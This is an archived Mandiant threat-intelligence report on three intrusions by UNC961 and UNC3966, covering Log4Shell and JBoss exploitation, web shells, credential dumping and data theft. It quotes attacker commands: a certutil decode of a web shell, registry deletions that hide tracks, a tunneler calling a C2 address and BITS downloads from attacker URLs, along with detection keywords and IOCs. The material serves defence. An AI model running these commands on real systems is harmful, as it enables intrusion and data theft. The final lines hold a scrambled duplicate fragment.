{
	"id": "88206e33-ad40-4cb0-8934-1a5844146f77",
	"created_at": "2026-04-06T00:11:58.572666Z",
	"updated_at": "2026-04-10T13:11:47.925322Z",
	"deleted_at": null,
	"sha1_hash": "4ccfa7f390952235e6b2597e67fd40f4fcf36c72",
	"title": "UNC961 in the Multiverse of Mandiant: Three Encounters with a Financially Motivated Threat Actor | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4996710,
	"plain_text": "UNC961 in the Multiverse of Mandiant: Three Encounters with a\r\nFinancially Motivated Threat Actor | Mandiant\r\nBy Mandiant\r\nPublished: 2023-03-23 · Archived: 2026-04-05 14:15:48 UTC\r\nWritten by: Ryan Tomcik, Rufus Brown, Josh Fleischer\r\nWeb application vulnerabilities are like doorways: you never know who or what will walk through. Between December\r\n2021 and July 2022, the Mandiant Managed Defense and Incident Response teams responded to three UNC961 intrusions at\r\ndifferent organizations that each started in similar fashion. Two of these victims were under the protection of Managed\r\nDefense who identified and responded to the threat before significant impact occurred. In the third intrusion, the Mandiant\r\nIncident Response team was contacted after UNC961 had compromised the victim and transferred access to UNC3966.\r\nThis blog post covers the details and timeline of each intrusion conducted by UNC961, along with detection opportunities\r\nand examples of how Managed Defense’s proactive threat hunting, investigation, and response routinely limits the impact on\r\nour customers’ business and prevents their reality from being desecrated. Relevant MITRE ATT\u0026CK® tactics and technique\r\nIDs are included in this blog post to indicate the threat actors’ objectives at various points in the intrusions.\r\nAttribution and Targeting\r\nAcross the multiverse of threat actors, UNC961 is financially motivated and has primarily targeted victim organizations in\r\nNorth America since at least 2016. UNC961 is notable for quickly targeting vulnerable Internet-facing servers during\r\nperiods of vulnerability and exploit code disclosure. The threat group overlaps with multiple publicly reported threat\r\nclusters, including CrowdStrike's named group ProphetSpider. Mandiant first publicly reported on UNC961 in our blog post,\r\nForged in Fire: A Survey of MobileIron Log4Shell Exploitation, which details the threat group leveraging the Log4Shell\r\n(CVE-2021-44228) vulnerability for initial access. We believe some of the primary objectives of this group are to steal\r\nsensitive data from victims and provide access to ransomware-affiliated threat clusters.\r\nUNC961 takes a cost-effective approach to accessing each victim by leveraging publicly accessible exploit code from\r\nrecently disclosed vulnerabilities and weaponizing them for use. We have often observed UNC961 exploit popular Internet-facing application servers, including Atlassian Confluence (CVE-2021-26084), Citrix ADC (CVE-2019-19781), Oracle\r\nWebLogic (CVE-2020-14750), Gitlab (CVE-2021-22205) and others. After gaining access, UNC961 has commonly targeted\r\nand exfiltrated sensitive data, including network reconnaissance and credential information that could be sold or used in\r\nsupport of follow-on missions. In multiple instances, UNC961 intrusion activity has preceded the deployment of MAZE and\r\nEGREGOR ransomware from distinct follow-on actors.\r\nUniverse #1: I Am MobileIron Man\r\nIn our first incident, our story begins at Managed Defense. The lights are dim, and a brief message suddenly appears:\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 1 of 21\n\nFigure 1: Message captured in network egress traffic\r\nAt first glance, this somewhat innocuous message may disappear into the eternal din of warning messages we’ve come to\r\nexpect from using any piece of technology. However, to trained analysts, these few bytes egressing a network may be\r\nindicative of something more ominous under way.\r\nRed teamers, capture-the-flag enthusiasts, and APT actors alike are probably familiar with the following command:\r\nFigure 2: TCP bash reverse shell command\r\nThis simple, well-documented bash TCP reverse shell is often witnessed by Mandiant as the payload for many exploits\r\ntargeting UNIX-like hosts [MITRE ATT\u0026CK® Technique T1059.004]. Fortunately for us, establishing an interactive shell\r\nwithout an established TTY will cause the message bash: no job control in this shell to get sent from the victim’s\r\nhost to the attacker, providing an excellent detection opportunity.\r\nNow that we had a host in our sights, we began expanding our scope to include events preceding and following this activity.\r\nWe collected local application logs around our timeframe of interest from the host and started ripgrepping for keywords\r\n(such as the destination IP address) and scrutinizing log entries around our timeframe of interest. This ultimately revealed a\r\nMobileIron Core log entry that also fit the timeframe of our initial bash shell detection:\r\nFigure 3: MobileIron Core log entry\r\nThe string in the requesterName field told us that attackers had triggered CVE-2021-44228 by submitting the exploit into\r\nthe application’s web portal login. Since the goal of CVE-2021-44228 is to get this \"JNDI\" exploit string written to any log\r\nthat's processed by a vulnerable instance of Apache, the fact that this login attempt failed is irrelevant. The exploit still gets\r\nlogged, which spawned the reverse shell seen earlier.\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 2 of 21\n\nAttackers will commonly leverage various obfuscation techniques to increase the difficulty of detection and to stay one step\r\nahead of analysts. In this case, they substituted certain characters as nested strings. Let’s dig deeper into the exploit and\r\npayload:\r\nFigure 4: Obfuscated JNDI request\r\nIf we convert each nested statement into the character(s) listed at the end of each statement (after the colon and dash), we get\r\nthe following:\r\nFigure 5: Decoded JNDI request\r\nA quick search for “TomcatBypass” on github.com points us to the repository of a project named JNDI-Exploit. Perusing\r\nthis repo’s readme document, we can see several other familiar URI patterns, giving us a better idea of the attacker’s\r\ncapabilities with this tool and what each logged request is attempting to do (translated readme file).\r\nIn this case, the URI /TomcatBypass/Command/Base64/ simply enables an attacker to pass a Base64-encoded command to\r\nthe shell.\r\nDecoding the observed Base64 command in the exploit payload yields the following:\r\nThis first part of this command unsets the bash HISTFILE variable, which prevents the operating system from logging\r\nfuture commands. Next, the command establishes the basic reverse shell which resulted in our initial detection.\r\nDespite successfully establishing a bash shell, we observed multiple similar commands issued by UNC961, suggesting that\r\nthese exploits and payloads may have been repeatedly sent out across the Internet indiscriminately.\r\nUNC961 began their hands-on interaction with the host by issuing the ps -x command, listing all processes running under\r\nthe same owner. Realizing that multiple bash shells were running on the host (including some from other threat actors), our\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 3 of 21\n\nactor ran the kill -9 command along with numerous PIDs to end the other established shells on the host running under\r\nthe Tomcat process.\r\nFollowing this, UNC961 deployed their HOLEPUNCH tunneler utility to the host. HOLEPUNCH is a Windows \u0026 UNIX\r\nsource-compatible tunneler that uses SOCKS5 style commands wrapped in a custom outer structure to multiplex\r\nconnections back to its command and control (C2) server.\r\nUnfortunately for UNC961, these findings assisted the customer in remediating their vulnerable MobileIron infrastructure\r\nbefore any further compromise took place (Note: Ivanti, the parent company of MobileIron, published a permanent fix for\r\nApache Log4j vulnerabilities in the February 2022 release for Core 11.5.0.0).\r\nUniverse #2: Web (Shell) Slinger\r\nFigure 6: UNC961 CVE-2017-7504 compromise timeline\r\nIn our second incident, Managed Defense spotted UNC961 sticking with the theme of web application attacks when the\r\nthreat actor exploited a JBoss MQ Java Message Service (JMS) Deserialization vulnerability (CVE-2017-7504) on a\r\ncustomer’s Internet-exposed server [T1190]. The earliest evidence of compromise occurred when the threat actor generated\r\nan HTTP POST request to the URI /jbossmq-httpil/HTTPServerILServlet, which coincided with the execution of the\r\ncommand cmd.exe /c \"dir \u003e k.txt\" by the java.exe process.\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 4 of 21\n\nThree minutes later, the java.exe process executed a command to write a Base64-encoded PHP web shell to the server\r\n[T1505.003]. Next, the java.exe process executed a certutil command to decode the contents of the Base64-encoded web\r\nshell file k.txt to a web accessible file k.jspx [T1140].\r\nParent: C:\\Java\\bin\\java.exe\r\nProcess: C:\\Windows\\System32\\cmd.exe\r\nCommands:\r\ncmd.exe /c \"echo \u003c2,212 Base64 characters\u003e \u003e k.txt\"\r\ncmd.exe /c \"certutil -f -decode ..\\server\\default\\deploy\\jms\\jbossmq-httpil.sar\\jbossmq-httpil.war\\k.txt ..\\server\\default\r\nFigure 7: Java process used to create an encoded web shell\r\nUNC961 then deployed a second web shell that Mandiant identified as a JSP-based web shell generated by the BLUEBEAM\r\nweb shell framework [T1505.003]. BLUEBEAM (aka. Godzilla) is a publicly available web shell management tool written\r\nin JAVA that can generate web shell payloads in JSP, ASP.NET, and PHP. Mandiant has also observed BLUEBEAM web\r\nshell deployment following the exploitation of ProxyShell vulnerabilities on Microsoft Exchange Servers.\r\nPath: C:\\\u003cpath\u003e\\jboss-4.2.3.GA\\server\\default\\deploy\\jms\\jbossmq-httpil.sar\\jbossmq-httpil.war\r\nFile Name: httpil.jsp\r\nFigure 8: BLUEBEAM.JSP web shell\r\nOne month later, UNC961 came back to the httpil.jsp web shell and started to execute internal discovery commands that\r\nmanifested as child processes under the parent process java.exe. Examples of UNC961 discovery commands include using\r\nthe ping utility to test network connections [T1018], the net utility to enumerate permission groups [T1069.001, T1069.002],\r\nthe ipconfig utility to view local network configuration [T1016], the quser utility to view currently logged on users [T1033],\r\nand the dir command to view user account paths [T1083] (Figure 9). UNC961 performed nslookup commands for the\r\ndomain and subdomains of intensive[.]int and pinged the IP address 119.9.3[.]198. This domain and IP address are\r\nassociated with Rackspace DNS servers, which may indicate network connectivity testing.\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026quser\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026ipconfig /all\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026slookup intensive[.]int\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026nslookup intensive[.]int\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026nslookup ord.intensive[.]int\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026nslookup syd.intensive[.]int\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026ping -n 1 119.9.3[.]198\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026dir c:\\users\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026net user\" 2\u003e\u00261\r\ncmd /c \"cd /d \"C:/\u003cpath\u003e/jboss-4.2.3.GA/bin/\"\u0026nslookup \u003cadmin account\u003e /domain\" 2\u003e\u00261\r\nFigure 9: Commands executed through the web shell\r\nManaged Defense’s threat hunting team identified the web shell executed commands using multi-event correlation that\r\nmatched event sequences tagged under the MITRE ATT\u0026CK® Persistence and Discovery tactics. In this case, UNC961\r\nused their web shell [Persistence] to launch commands on the victim server that collected local network information\r\n[Discovery]. Mandiant uses multi-event correlation techniques, such as sequencing and clustering, for low signal events that,\r\nwhen combined, can identify threat actor behaviors. The customer isolated the server, and the threat actor was eradicated\r\nfrom the environment before they could conduct further actions on their objectives.\r\nUniverse #3: Every Morning, The Same Nightmare\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 5 of 21\n\nIn our final incident, an organization first identified evidence of compromise when they detected a ransom note file\r\nHOW_DECRYPT.TXT related to CryptoDefense ransomware written to a file server 131 days after UNC961 gained initial\r\naccess to their environment. Mandiant’s Incident Response team was called in at that point to investigate and assist with\r\nevicting the threat actors from the customer’s environment. During the investigation, Mandiant identified evidence of an\r\naccess hand-off at day 63 between UNC961 and another threat actor Mandiant refers to as UNC3966, prior to data collection\r\nand exfiltration. UNC3966 collected data and performed exfiltration; however, despite a ransom note referencing\r\nCryptoDefense, the threat actor didn’t appear to run an encryptor.\r\nFigure 10: Initial UNC961 access with HOLERUN AND MUTEPUT deployment\r\nUNC961 gained an initial foothold on a compromised Windows 2008 server and deployed HOLERUN and MUTEPUT\r\nmalware as a Windows Service [T1543.003] before going relatively dormant for two months. HOLERUN is a Windows\r\nutility written in C that functions similar to Runas that can be used to create processes and run commands under specified\r\nusers with corresponding privileges. MUTEPUT is a backdoor that supports file download, file upload, and arbitrary\r\ncommand execution. During the period of low activity, UNC961 used the WGET utility to download additional malware and\r\ntools [T1105], including the PSCP file transfer utility, 7-Zip file archiver, the TxPortMap port scanner, and a SOCKS proxy\r\nutility.\r\nAround two months after the initial compromise, there was an access hand-off event between UNC961 and UNC3966.\r\nMandiant identified a HOLERUN utility installation by UNC961 followed by the deployment of the BARNWORK\r\nbackdoor for UNC3966 approximately 26 minutes later. BARNWORK is a backdoor written in C++ that communicates\r\nusing a custom binary protocol.\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 6 of 21\n\nFigure 11: Handoff between UNC961 and UNC3966\r\nAfter receiving access, UNC3966 moved laterally through the environment over Remote Desktop Protocol (RDP)\r\n[T1021.001] using a compromised domain administrator account [T1078.002] and installed the BARNWORK backdoor and\r\nLIGHTBUNNY tunneler malware as Scheduled Tasks [T1053.005]. LIGHTBUNNY is a client component of a tunneler\r\nwritten in C that wraps a custom protocol over SOCKS. UNC3966 also used Windows Background Intelligent Transfer\r\nService (BITS) jobs [T1197] to download additional payloads hosted on their infrastructure [T1105].\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 7 of 21\n\nFigure 12: LIGHTBUNNY deployment and BITS download jobs\r\nUNC3966 performed internal host discovery [T1018] using the ping and nslookup utilities and collected system information\r\n[T1082] using the Windows Management Instrumentation Command-line utility wmic.exe [T1047]. To cover their tracks,\r\nUNC3966 ran multiple reg.exe commands to delete Registry keys containing information related to file searching, terminal\r\nservices remote desktop activity, and application launch activity [T1112, T1070.007].\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 8 of 21\n\nFigure 13: Indicator removal and discovery commands\r\nInterestingly, UNC961 reappeared post-handoff on day 116 to install a TURNSIGN tunneler on a new system. TURNSIGN\r\nis a tunneler that establishes a simple SOCKS5 server and creates an encrypted tunnel between the sample and a hard-coded\r\nC2.\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 9 of 21\n\nFigure 14: UNC961 deployment of TURNSIGN\r\nUNC3966 used the 7-zip archive utility to compress data related to Contracts and Accounting information that was stored on\r\na network attached storage (NAS) device [T1560.001] and transferred the data over SSH protocol [T1048] to threat actor-controlled IP addresses using the WinSCP utility.\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 10 of 21\n\nFigure 15: 7-zip file archival and exfiltration via WinSCP\r\nOn day 143, twelve days after the exfiltration activity, UNC3966 returned to the environment and executed a series of\r\ndiscovery commands to collect information related to the system, users, permission groups, and domain trusts [T1069.002,\r\nT1482, T1082, T1033]. UNC3966 downloaded additional tools from the file sharing website file[.]io to a domain controller,\r\nincluding a version of the Invoke-ShareFinder PowerShell script that was used to enumerate network shares.\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 11 of 21\n\nFigure 16: UNC3966 discovery commands and ShareFinder usage\r\nTo harvest additional account credentials, UNC3966 used the Task Manager application to dump LSASS memory on\r\nmultiple systems [T1003.001] and uploaded the dump files to the file sharing website dropmefiles[.]com [T1567]. The threat\r\nactor also created a new domain user account [T1136.002] and added it to the Domain Admins permissions group [T1098] to\r\nhave an independent account for privileged command execution and expanded access to the environment.\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 12 of 21\n\nFigure 17: LSASS process dump and new domain admin account creation\r\nTo perform additional network reconnaissance, UNC3966 leveraged the ADFind utility to collect Active Directory\r\ninformation [T1016, T1018, T1069.002, T1482, T1087.002]. Mandiant identified evidence of credential access activities\r\nleveraging Mimikatz DCSync [T1003.006] and the Windows Active Directory utility Ntdsutil to dump the Active Directory\r\ndatabase ntds.dit [T1003.003] and the SYSTEM and SECURITY registry hives on a domain controller.\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 13 of 21\n\nFigure 18: ADFind execution and NTDS Active Directory dump\r\nMandiant worked with the customer to harden the environment and limit the impact of a potential ransomware deployment.\r\nThe customer responded swiftly enough to prevent ransomware encryption in the environment, but the extent of the\r\ncompromise necessitated a lengthy remediation process, including rebuilding infected systems, scoping sensitive data access\r\nand lateral movement by the threat actor during their months of access, and coordinating and performing an enterprise-wide\r\npassword reset. During the eradication period, Mandiant helped the customer prepare responses for possible extortion or\r\nransom scenarios. UNC961 and UNC3966’s access was revoked and the customer finally put this nightmare to rest.\r\nOutlook and Implications\r\nIn a multiverse full of threat actors, UNC961 is resourceful in their opportunistic angle to initial access operations. The\r\nthreat group employs a cost-effective approach to achieve initial access by exploiting recently disclosed vulnerabilities using\r\npublicly available exploit code. This differs from other common initial intrusion vectors, such as phishing, and is\r\nindiscriminate by nature, which can provide UNC961 with numerous successful intrusions.\r\nAny organization can find themselves targeted by threat actors like UNC961 but can count on Mandiant’s Managed\r\nDetection \u0026 Response (MDR) and threat hunting services for protection. Proactive discovery of external assets using Attack\r\nSurface Management can also help identify vulnerabilities, misconfigurations, and other exposures that could provide a\r\ndoorway to threat actors.\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 14 of 21\n\nDetection Opportunities\r\nDetection\r\nOpportunity\r\nMITRE\r\nATT\u0026CK®\r\nTechnique\r\nEvent Details\r\nWeb server\r\nprocess echo\r\nBase64-\r\nencoded string\r\nT1505.003\r\nParent Process: java.exe\r\nCommand(s):\r\ncmd.exe /c \"echo \u003c2,212 Base64 characters\u003e \u003e k.txt\"\r\nWeb server\r\nprocess\r\nlaunching\r\ndiscovery\r\ncommands\r\nT1505.003,\r\nT1083,\r\nT1018,\r\nT1069.001,\r\nT1069.002,\r\nT1016,\r\nT1033,\r\nT1049\r\nParent Process: java.exe\r\nCommand(s):\r\ncmd.exe /c \"dir \u003e k.txt\"\r\nquser 2\u003e\u00261\r\nipconfig /all 2\u003e\u00261\r\nnslookup intensive[.]int 2\u003e\u00261\r\nnslookup ord.intensive[.]int 2\u003e\u00261\r\nnslookup syd.intensive[.]int 2\u003e\u00261\r\nping -n 1 119.9.3[.]198 2\u003e\u00261\r\ndir c:\\users 2\u003e\u00261\r\nnet user 2\u003e\u00261\r\nnslookup /domain 2\u003e\u00261\r\nWeb shell\r\ndeployment\r\nusing certutil to\r\ndecode payload\r\nT1505.003,\r\nT1140\r\nParent Process: java.exe\r\nCommands:\r\ncmd.exe /c \"certutil -f -decode ..\\server\\default\\deploy\\jms\\jbossmq-httpil.sar\\jbossmq-httpil.w\r\n..\\server\\default\\deploy\\jms\\jbossmq-httpil.sar\\jbossmq-httpil.war\\k.jspx\"\r\nMessage\r\ngenerated\r\nacross network\r\ntraffic when\r\nestablishing an\r\ninteractive shell\r\nwithout an\r\nestablished\r\nTTY\r\nT1059.004 String: bash: no job control in this shell\r\nSuspicious\r\nWindows\r\nService creation\r\nevents\r\nT1543.003\r\nSuspicious\r\nWindows\r\nT1053.005 LIGHTBUNNY Task Name: MKSAuth\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 15 of 21\n\nScheduled Task\r\ncreation events\r\nProgram Path: C:\\Users\\Administrator\\AppData\\Local\\Temp\\vmtoolsd.exeLIGHTBUNNY Task\r\nName: MKS Update Tools\r\nProgram Path: C:\\MKS\\mksnt\\mks.exeBARNWORK Task Name: MKSAuth\r\nProgram Path: C:\\Windows\\System32\\mksauth.exe\r\nSuspicious\r\nBITS transfer\r\njobs\r\nT1105,\r\nT1197\r\nLog: Microsoft-Windows-Bits-Client/Operational\r\nEID: 59\r\nMessages:\r\nBITS started the myjob transfer job that is associated with the https[:]//ms-prod19-\r\nlive[.]com/rehjhj8785780923853/abc URL.\r\nBITS started the myjob transfer job that is associated with the https[:]//ms-prod19-\r\nlive[.]com/rehjhj8785780923853/cdef URL.\r\nSuspicious\r\nWGET file\r\ndownload\r\nactivity\r\nT1105\r\nUser-Agent: Wget/1.11.4\r\nURLs:\r\n/7z.bin\r\n/pscp.bin\r\n/333.bmp\r\n/333.bpm\r\n/auditd64.bin\r\n/TxPortMap.bin\r\nIndicator\r\nremoval from\r\nWindows\r\nRegistry\r\nT1112,\r\nT1070.007\r\nProcess: reg.exe\r\nCommand Line:\r\nreg  delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /v\r\nreg  delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f\r\nreg  add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"\r\nattrib  C:\\Users\\TEMP\\documents\\Default.rdp -s -h\r\nreg  delete\r\n\"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedP\r\n/va /f\r\nreg  delete\r\n\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WordWhee\r\n/va /f\r\nreg  delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 16 of 21\n\nSystem\r\ninformation\r\ncollection using\r\nthe Windows\r\nManagement\r\nInstrumentation\r\nCommand-line\r\nutility wmic.exe\r\nT1047\r\nCommand Line examples:\r\nwmic  /node:\"10.0.0.1\" logicaldisk get deviceid,drivetype,filesystem,freespace,size,volumenam\r\nwmic  /node:\"10.0.0.2\" logicaldisk get deviceid,drivetype,filesystem,freespace,size,volumenam\r\n…\r\nwmic  /node:\"10.0.0.72\" logicaldisk get deviceid,drivetype,filesystem,freespace,size,volumena\r\nExecution and\r\nremoval of\r\nPsExec Service\r\nT1569.002,\r\nT1070,\r\nT1543.003\r\nLog: System\r\nEID: 7045Message:\r\nA service was installed in the system.\r\nService Name:  PSEXESVC\r\nService File Name:  %SystemRoot%\\PSEXESVC.exe\r\nService Type:  user mode service\r\nService Start Type:  demand start\r\nService Account:  LocalSystem\r\n--\r\nParent Process: C:\\Windows\\System32\\cmd.exe\r\nProcess: C:\\MKS\\bin\\PsExec.exe\r\nCommand Line:\r\npsexec -s cmd\r\n--\r\nProcess: sc.exe\r\nCommand Line:\r\nsc delete psexesvc\r\n7-zip execution\r\nto create\r\narchive with\r\nremote share or\r\nkeywords of\r\ninterest on\r\ncommand line\r\nT1560.001\r\nCommand Line Examples:\r\n\u003cpath\u003e\\7zG.exe\" a -i#7zMap5172:94:7zEvent7590 -ad -saa --\r\n\"\\\\10.0.0.1\\nasdevice\\Path\\Accounting\"\r\n”\u003cpath\u003e\\tmp\\7\\App\\7-Zip64\\7zG.exe\" a -i#7zMap21824:98:7zEvent2463 -ad -saa --\r\n\"\\\\10.0.0.1\\nasdevice\\Path\\Contracts\"\r\nSpike (\u003e 1GB)\r\nin outbound\r\nSSH byte\r\ntransfer activity\r\nT1048,\r\nT1071.002,\r\nT1021.004\r\nWinSCP connections to 104.149.170[.]183:22 and 23.227.203[.]214:22\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 17 of 21\n\nto remote IP\r\naddresses\r\nExecution of\r\nPowerShell by\r\nBARNWORK\r\nbackdoor\r\nT1059.001\r\nParent Process: C:\\MKS\\bin\\mks.exe\r\nProcess: powershell.exe\r\nCommand Line:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Set-ExecutionPolicy\r\nRemoteSigned -Scope Process -Force -Confirm:$false;$PSDefaultParameterValues = @{'Ou\r\nFile:Encoding' = 'utf8'}; \" C:\\Windows\\TEMP\\CWwaKhefO.ps1\" | Out-File -encoding UTF8\r\n\"C:\\Windows\\TEMP\\\\bAbiTGhY.txt\"\r\nLIGHTBUNNY\r\nexecution by\r\nWindows\r\nCommand Shell\r\nT1059.003,\r\nT1572\r\nParent Process: C:\\Windows\\System32\\cmd.exe\r\nProcess: C:\\Users\\Administrator\\AppData\\Local\\Temp\\vmtools.exe\r\nCommand Line:\r\n\"C:\\Windows\\system32\\cmd.exe\"  /c \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\vmtools.e\r\n37.1.209[.]20 443\"\r\nShareFinder\r\nPowerShell\r\nscript execution\r\nand Script\r\nBlock Logging\r\nkeywords\r\nT1059.001,\r\nT1135\r\nFile Name: SF.ps1\r\nOutput File Names:\r\nsh.txt\r\nshda.txt\r\n--\r\nLog: Microsoft-Windows-PowerShell/Operational\r\nEID: 4104\r\nMessage example:\r\n#requires -version 2\r\nImplementation of Sharefinder that utilizes https://github.com/mattifestation/psreflect to stay off of d\r\nBy @harmj0y\r\nMessage Keyword Examples:\r\nSharefinder\r\nNew-InMemoryModule\r\nmattifestation\r\nharmj0y\r\nInvoke-ShareFinder\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 18 of 21\n\nLSASS process\r\nmemory\r\ndumped by\r\nTask Manager\r\nT1003.001\r\nProcess: C:\\Windows\\System32\\Taskmgr.exe\r\nFile Write:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\lsass.DMP\r\nCommand to\r\nlaunch\r\nPowerShell\r\nfrom a specific\r\ndirectory\r\nT1059.001\r\nProcess Command Line:\r\nPowerShell.exe -noexit -command Set-Location -literalPath 'C:\\ProgramData'\r\nADFind\r\nreconnaissance\r\nT1016,\r\nT1018,\r\nT1069.002,\r\nT1482,\r\nT1087.002\r\nCommand Line Examples:\r\nC:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\\u003cuser\u003e\\Downloads\\ADfind\\backup.bat\" ”\r\nadfind.exe  -f \"(objectcategory=group)\"\r\nadfind.exe  -f \"(objectcategory=organizationalUnit)\"\r\nadfind.exe  -f \"(objectcategory=person)\"\r\nadfind.exe  -f \"objectcategory=computer\"\r\nadfind.exe  -gcb -sc trustdmp\r\nadfind.exe  -sc trustdmp\r\nadfind.exe  -subnets -f (objectCategory=subnet)\r\nSuspicious\r\nntdsutil.exe\r\nexecution and\r\nfile writes\r\nT1003.003\r\nProcess: ntdsutil.exe\r\nFiles Created:\r\nC:\\temp\\Active Directory\\ntds.dit\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\tmp.edb\r\nC:\\temp\\registry\\SECURITY\r\nC:\\temp\\registry\\SYSTEM\r\nIndicators of Compromise\r\nType Value Attribution Description\r\nMD5 c55f4b123c645f9c5a1d00205ab2e61e UNC3966 LIGHTBUNNY tunneler\r\nMD5 31c49b87463f4e4ce6ae4c442319d3a2 UNC961 HOLERUN\r\nIP 104.149.170[.]183 UNC3966 WinSCP\r\nIP 23.227.203[.]214 UNC3966 WinSCP\r\nIP 37.1.209[.]20 UNC3966 Command and Control\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 19 of 21\n\nIP 107.181.187[.]184 UNC961 Command and Control\r\nIP 45.61.136[.]39 UNC961 Command and Control\r\nIP 209.141.61[.]225 UNC961 Command and Control\r\nIP 107.181.187[.]182 UNC961 Command and Control\r\nIP 136.244.69[.]29 UNC961 Exploitation\r\nIP 5.149.250[.]214 UNC961 Web shell Interaction\r\nURL https[:]//ms-prod19-live[.]com/rehjhj8785780923853/abc UNC3966 Download\r\nURL https[:]//ms-prod19-live[.]com/rehjhj8785780923853/cdef UNC3966 Download\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA100-299 Active Directory - ADFIND.EXE, Enumeration\r\nA105-181 Host CLI - Secret Dumps with Ntdsutil\r\nA100-879 Malicious File Transfer - ADFIND.EXE, Download\r\nA101-172 Active Directory - ADFIND.EXE, User Query\r\nA101-170 Active Directory - ADFIND.EXE, Organizational Units Query\r\nA101-168 Active Directory - ADFIND.EXE, Domain Trust Query\r\nA101-167 Active Directory - ADFIND.EXE, Computer Query\r\nA101-169 Active Directory - ADFIND.EXE, Group Query\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 20 of 21\n\nA106-034 Host CLI - POWERVIEW, ShareFinder, Execution, Variant#1\r\nA106-033 Application Vulnerability - UNC961, CVE-2021-44228, HTTP GET, LDAP Callback via URI Path\r\nA106-030 Malicious File Transfer - UNC961, TURNSIGN, Download, Variant #1\r\nA106-029 Malicious File Transfer - UNC961, MUTEPUT, Download, Variant #1\r\nA106-028 Malicious File Transfer - UNC961, BLUEBEAM.JSP, Download, Variant #1\r\nA106-027 Application Vulnernability - CVE-2017-7504, Exploitation\r\nA106-026 Protected Theater - UNC3966, LIGHTBUNNY, Execution, Variant #1\r\nA106-025 Malicious File Transfer - UNC3966, LIGHTBUNNY, Download, Variant #1\r\nA106-024 Malicious File Transfer - UNC961, HOLERUN, Download, Variant #1\r\nA106-023 Command and Control - Bash Non Interactive Reverse Shell\r\nA105-179 Host CLI - MIMIKATZ (2.2.0), DCSync, Variant #1\r\nAcknowledgements\r\nA big ‘thank you 3000’ to Tim Martin, threat hunting lead for Managed Defense, for collaborating on the initial idea and\r\ncontributing technical and comical insights. Special thanks to Tommy Dacanay and Foti Castelan for their marvelous\r\ntechnical review and information sharing that helped shape the multiverse. A cosmic high-five to the FLARE analysts who\r\nanalyzed UNC961 and UNC3966 payloads referenced in this blog post: Matt Williams, Muhammad Umair, Jay Smith, and\r\nJosh Homan. And a tip of the helmet to Matthew Hoerger for assembling Mandiant Security Validation (MSV) Actions and\r\nAna Foreman for the graphics.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nhttps://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated\r\nPage 21 of 21\n\nFigure 17: LSASS To perform additional process dump and new network reconnaissance, domain admin UNC3966 account creation leveraged the ADFind utility to collect Active Directory \ninformation [T1016, 